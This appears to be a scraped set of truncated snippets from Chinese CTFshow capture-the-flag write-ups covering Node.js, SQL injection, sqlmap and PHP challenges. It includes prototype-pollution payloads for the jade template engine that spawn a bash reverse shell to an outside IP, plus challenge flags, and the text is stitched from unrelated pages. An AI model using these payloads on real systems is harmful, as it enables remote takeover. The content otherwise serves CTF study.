web342,343 jade {"__proto__":{"__proto__":{"type":"Block","nodes":"","compileDebug":1,"self":1,"line":"global.process.mainModule.constructor._load('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ip/端口 0>&1\"')"}}} 或 {"__proto__":{"__proto__": {...
根据提示直接在url后面加editor上传flag000g.txt文件然后访问即可(这题挺好玩的) ctfshow{065c5b31-c650-405f-b946-792ebb342e36} web15: 公开的信息比如邮箱,可能造成信息泄露,产生严重后果 ctfshow{bf660ad3-6a42-4db7-9470-0e0b9805e314} web16: 对于测试用的探针,使用完毕后要及时删除,可能会造成信息...
web188有过滤的数字型注入//查询语句 //拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username}"; //返回逻辑 //用户名检测 if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){ $ret['msg']='...
CTFshow NodeJs web342 初始界面: payload:(json) {"__proto__":{"__proto__": {"type":"Code","compileDebug":true,"self":true,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').execSync('bash -c \"bash -i >& /dev/tcp/120.46.41.173/9023 0>...
web201sqlmap 工具使用练习。 题目提示 --user-agent 指定 user-agent,实际上不是 sqlmap 的 ua 还不让访问,测试 ua sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org) 可用。 题目还指定使用 --referer 绕过 referer 检查,带着 sqlmap 的 ua 访问会提示“打击盗版人人有责,你都不是从ctf.show来的”,故指定 ...
具体可见新春欢乐赛的web2,本质是通过设置sessionid的值,在通过session_id这个无参函数来获得目标值 648 继续审计user.php function evilClass($m,$k){classctfshow{public$m;publicfunction construct($m){ $this->$m=$m; } } $ctfshow=newctfshow($m); ...
web321 web322-324过滤了; web325过滤了. 前面那个String.fromCharCode生产payload web327 web328 web329 web320 web331 ...
web1 题目 代码很安全,没有漏洞。 ctf.show萌新计划web1 <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id是否存在 if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) ...
web_月饼杯 最近在ctfshow上看到了不少好题,来学一学,做一做 web1_此夜圆 题目直接给出了源码: <?phperror_reporting(0);classa{public$uname;public$password;publicfunction__construct($uname,$password){$this->uname=$uname;$this->password=$password; ...
web647 读取的page.php刚开始看到一个传参点,sqlmap跑一下 image-20230805153432337 存在注入 image-20230805153546825 在ctfshow_secret这个表里得到了一个flag image-20230805153703206 得到了key key_is_here_you_know image-20230805153840718 继续回过头,刚才的user.php的源码其实是有647的cat,看一下如何满足条件 image...